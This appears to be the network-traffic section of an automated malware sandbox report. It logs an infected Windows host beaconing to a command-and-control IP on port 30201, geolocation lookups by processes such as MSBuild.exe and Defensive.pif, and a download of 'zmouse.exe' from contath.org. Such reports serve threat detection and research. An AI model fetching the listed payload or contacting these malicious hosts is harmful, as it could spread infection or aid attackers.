                                                                                                    Nov 19, 2024 15:59:01.294747114 CET5009630201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:01.294851065 CET5009630201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:01.299592018 CET3020150096181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:01.403079033 CET5009730201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:01.407999039 CET3020150097181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:01.408076048 CET5009730201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:01.408740044 CET5009730201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:01.413558960 CET3020150097181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:01.413693905 CET5009730201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:01.418579102 CET3020150097181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:02.099271059 CET3020150097181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:02.099620104 CET5009730201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.099756956 CET5009730201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.104535103 CET3020150097181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:02.217926979 CET5009830201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.222954035 CET3020150098181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:02.223114014 CET5009830201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.223792076 CET5009830201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.228629112 CET3020150098181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:02.228827000 CET5009830201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.233670950 CET3020150098181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:02.866359949 CET3020150098181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:02.866431952 CET5009830201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.866858959 CET5009830201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.871714115 CET3020150098181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:02.981415033 CET5009930201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.986440897 CET3020150099181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:02.986500025 CET5009930201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.987325907 CET5009930201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.992250919 CET3020150099181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:02.992315054 CET5009930201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:02.997126102 CET3020150099181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:03.641182899 CET3020150099181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:03.641258001 CET5009930201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:03.641486883 CET5009930201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:03.646295071 CET3020150099181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:03.749929905 CET5010030201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:03.755037069 CET3020150100181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:03.758058071 CET5010030201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:03.761920929 CET5010030201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:03.766706944 CET3020150100181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:03.768666983 CET5010030201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:03.773525000 CET3020150100181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:04.444925070 CET3020150100181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:04.445209980 CET5010030201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:04.445209980 CET5010030201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:04.450368881 CET3020150100181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:04.561922073 CET5010130201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:04.566963911 CET3020150101181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:04.567156076 CET5010130201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:04.567912102 CET5010130201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:04.572771072 CET3020150101181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:04.572875977 CET5010130201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:04.577688932 CET3020150101181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:05.254653931 CET3020150101181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:05.254731894 CET5010130201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:05.254887104 CET5010130201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:05.259670019 CET3020150101181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:05.371820927 CET5010230201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:05.378470898 CET3020150102181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:05.378621101 CET5010230201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:05.379157066 CET5010230201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:05.383964062 CET3020150102181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:05.384083033 CET5010230201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:05.388899088 CET3020150102181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:06.066771030 CET3020150102181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:06.066927910 CET5010230201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.067023039 CET5010230201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.071783066 CET3020150102181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:06.168803930 CET5010330201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.173917055 CET3020150103181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:06.174076080 CET5010330201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.174771070 CET5010330201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.179529905 CET3020150103181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:06.179714918 CET5010330201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.184571981 CET3020150103181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:06.851303101 CET3020150103181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:06.851366043 CET5010330201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.851599932 CET5010330201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.856357098 CET3020150103181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:06.966221094 CET5010430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.971123934 CET3020150104181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:06.971198082 CET5010430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.971842051 CET5010430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.976679087 CET3020150104181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:06.976777077 CET5010430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:06.981551886 CET3020150104181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:07.622726917 CET3020150104181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:07.622797966 CET5010430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:07.623069048 CET5010430201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:07.627821922 CET3020150104181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:07.731540918 CET5010530201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:08.715689898 CET49773443192.168.2.574.220.219.13
                                                                                                    Nov 19, 2024 15:59:08.786108971 CET5010530201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:09.242825031 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:09.247945070 CET497553020192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:09.252824068 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:09.280965090 CET302150061181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:09.324140072 CET500613021192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:09.564388037 CET500613021192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:09.569238901 CET302150061181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:10.824174881 CET5010530201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:14.825954914 CET5010530201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:16.496280909 CET4976480192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 15:59:16.839873075 CET4976480192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 15:59:17.636698008 CET4976480192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 15:59:18.933566093 CET4976480192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 15:59:21.433521986 CET4976480192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 15:59:22.824219942 CET5010530201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:26.324156046 CET4976480192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 15:59:33.857003927 CET5010630201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:34.933500051 CET5010630201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:35.933505058 CET4976480192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 15:59:36.933640003 CET5010630201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:39.270733118 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:39.272147894 CET497553020192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:39.277123928 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:39.344711065 CET302150061181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:39.365976095 CET500613021192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:39.370932102 CET302150061181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 15:59:40.933511019 CET5010630201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:48.933569908 CET5010630201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:57.560348988 CET5010730201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 15:59:58.714739084 CET5010730201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:00.714724064 CET5010730201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:04.824105024 CET5010730201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:09.289824963 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:00:09.291342020 CET497553020192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:09.297197104 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:00:09.335536957 CET302150061181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:00:09.433460951 CET500613021192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:09.961949110 CET500613021192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:09.967122078 CET302150061181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:00:12.825942039 CET5010730201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:22.013998985 CET5010830201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:23.121057987 CET5010830201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:25.146215916 CET5006380192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 16:00:25.268682957 CET5010830201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:25.636703968 CET5006380192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 16:00:26.324239016 CET5006380192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 16:00:27.636710882 CET5006380192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 16:00:29.292423010 CET5010830201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:30.136771917 CET5006380192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 16:00:35.136822939 CET5006380192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 16:00:37.324362993 CET5010830201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:39.335171938 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:00:39.336493015 CET497553020192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:39.341336966 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:00:39.363401890 CET302150061181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:00:39.433734894 CET500613021192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:39.474210978 CET500613021192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:39.479753971 CET302150061181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:00:44.824445963 CET5006380192.168.2.5178.237.33.50
                                                                                                    Nov 19, 2024 16:00:45.575227976 CET5010930201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:46.636960983 CET5010930201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:48.637037039 CET5010930201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:00:52.637063980 CET5010930201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:01:00.637234926 CET5010930201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:01:09.279515982 CET5011030201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:01:09.338535070 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:01:09.339776039 CET497553020192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:01:09.344619989 CET302049755181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:01:09.359433889 CET302150061181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:01:09.434374094 CET500613021192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:01:09.618930101 CET302150061181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:01:09.625133991 CET500613021192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:01:10.324779987 CET5011030201192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:01:10.360985994 CET500613021192.168.2.5181.141.40.225
                                                                                                    Nov 19, 2024 16:01:10.365973949 CET302150061181.141.40.225192.168.2.5
                                                                                                    Nov 19, 2024 16:01:12.324816942 CET5011030201192.168.2.5181.141.40.225

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 19, 2024 15:57:22.926868916 CET6383153192.168.2.51.1.1.1
                                                                                                    Nov 19, 2024 15:57:22.968501091 CET53638311.1.1.1192.168.2.5
                                                                                                    Nov 19, 2024 15:57:23.854521036 CET5057353192.168.2.51.1.1.1
                                                                                                    Nov 19, 2024 15:57:24.311002970 CET53505731.1.1.1192.168.2.5
                                                                                                    Nov 19, 2024 15:57:26.524748087 CET6343053192.168.2.51.1.1.1
                                                                                                    Nov 19, 2024 15:57:26.534183025 CET53634301.1.1.1192.168.2.5
                                                                                                    Nov 19, 2024 15:57:27.321983099 CET6337553192.168.2.51.1.1.1
                                                                                                    Nov 19, 2024 15:57:27.437575102 CET53633751.1.1.1192.168.2.5
                                                                                                    Nov 19, 2024 15:57:44.181133986 CET4971753192.168.2.51.1.1.1
                                                                                                    Nov 19, 2024 15:57:44.195441961 CET53497171.1.1.1192.168.2.5
                                                                                                    Nov 19, 2024 15:58:27.489402056 CET6469053192.168.2.51.1.1.1
                                                                                                    Nov 19, 2024 15:58:27.582556963 CET53646901.1.1.1192.168.2.5
                                                                                                    Nov 19, 2024 15:58:33.135206938 CET6552453192.168.2.51.1.1.1
                                                                                                    Nov 19, 2024 15:58:33.148308039 CET53655241.1.1.1192.168.2.5

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Nov 19, 2024 15:57:22.926868916 CET192.168.2.51.1.1.10x74b5Standard query (0)oportunidad-escolombiasegura.cfdA (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:23.854521036 CET192.168.2.51.1.1.10x3bbdStandard query (0)contath.orgA (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:26.524748087 CET192.168.2.51.1.1.10xa151Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:27.321983099 CET192.168.2.51.1.1.10x58aStandard query (0)bhcc.com.saA (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:44.181133986 CET192.168.2.51.1.1.10xce89Standard query (0)QxbVNDtCpHrITON.QxbVNDtCpHrITONA (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:58:27.489402056 CET192.168.2.51.1.1.10xb871Standard query (0)comercio0025.dns.armyA (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:58:33.135206938 CET192.168.2.51.1.1.10xb87Standard query (0)comercio0025.dns.armyA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Nov 19, 2024 15:57:19.535500050 CET1.1.1.1192.168.2.50x3e1aNo error (0)shed.dual-low.s-part-0015.t-0009.t-msedge.nets-part-0015.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:19.535500050 CET1.1.1.1192.168.2.50x3e1aNo error (0)s-part-0015.t-0009.t-msedge.net13.107.246.43A (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:22.744003057 CET1.1.1.1192.168.2.50x5f40No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:22.744003057 CET1.1.1.1192.168.2.50x5f40No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:22.968501091 CET1.1.1.1192.168.2.50x74b5No error (0)oportunidad-escolombiasegura.cfd181.141.40.225A (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:23.403076887 CET1.1.1.1192.168.2.50xca5cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:23.403076887 CET1.1.1.1192.168.2.50xca5cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:24.311002970 CET1.1.1.1192.168.2.50x3bbdNo error (0)contath.org69.49.234.173A (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:26.534183025 CET1.1.1.1192.168.2.50xa151No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:27.437575102 CET1.1.1.1192.168.2.50x58aNo error (0)bhcc.com.sa74.220.219.13A (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:57:44.195441961 CET1.1.1.1192.168.2.50xce89Name error (3)QxbVNDtCpHrITON.QxbVNDtCpHrITONnonenoneA (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:58:24.787553072 CET1.1.1.1192.168.2.50x4b19No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:58:24.787553072 CET1.1.1.1192.168.2.50x4b19No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:58:27.582556963 CET1.1.1.1192.168.2.50xb871Name error (3)comercio0025.dns.armynonenoneA (IP address)IN (0x0001)false
                                                                                                    Nov 19, 2024 15:58:33.148308039 CET1.1.1.1192.168.2.50xb87No error (0)comercio0025.dns.army181.141.40.225A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • contath.org
                                                                                                    • bhcc.com.sa
                                                                                                    • geoplugin.net

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.549764178.237.33.50806776C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Nov 19, 2024 15:57:26.588119030 CET71OUTGET /json.gp HTTP/1.1
                                                                                                    Host: geoplugin.net
                                                                                                    Cache-Control: no-cache
                                                                                                    Nov 19, 2024 15:57:27.108381033 CET1168INHTTP/1.1 200 OK
                                                                                                    date: Tue, 19 Nov 2024 14:57:27 GMT
                                                                                                    server: Apache
                                                                                                    content-length: 960
                                                                                                    content-type: application/json; charset=utf-8
                                                                                                    cache-control: public, max-age=300
                                                                                                    access-control-allow-origin: *
                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 32 31 36 2e 35 32 2e 31 38 33 2e 31 34 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                                                                    Data Ascii: { "geoplugin_request":"216.52.183.148", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7157", "geoplugin_longitude":"-74", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.550063178.237.33.50805488C:\Users\user\AppData\Local\Temp\88473\Defensive.pif
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Nov 19, 2024 15:58:34.520848989 CET71OUTGET /json.gp HTTP/1.1
                                                                                                    Host: geoplugin.net
                                                                                                    Cache-Control: no-cache
                                                                                                    Nov 19, 2024 15:58:35.076381922 CET1168INHTTP/1.1 200 OK
                                                                                                    date: Tue, 19 Nov 2024 14:58:34 GMT
                                                                                                    server: Apache
                                                                                                    content-length: 960
                                                                                                    content-type: application/json; charset=utf-8
                                                                                                    cache-control: public, max-age=300
                                                                                                    access-control-allow-origin: *
                                                                                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 32 31 36 2e 35 32 2e 31 38 33 2e 31 34 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                                                                    Data Ascii: { "geoplugin_request":"216.52.183.148", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7157", "geoplugin_longitude":"-74", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                    HTTPS Proxied Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.54974269.49.234.1734436848C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-11-19 14:57:25 UTC71OUTGET /zmouse.exe HTTP/1.1
                                                                                                    Host: contath.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-11-19 14:57:25 UTC223INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 19 Nov 2024 14:57:25 GMT
                                                                                                    Server: Apache
                                                                                                    Last-Modified: Mon, 18 Nov 2024 14:01:08 GMT
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 492544
                                                                                                    Connection: close
                                                                                                    Content-Type: application/x-msdownload
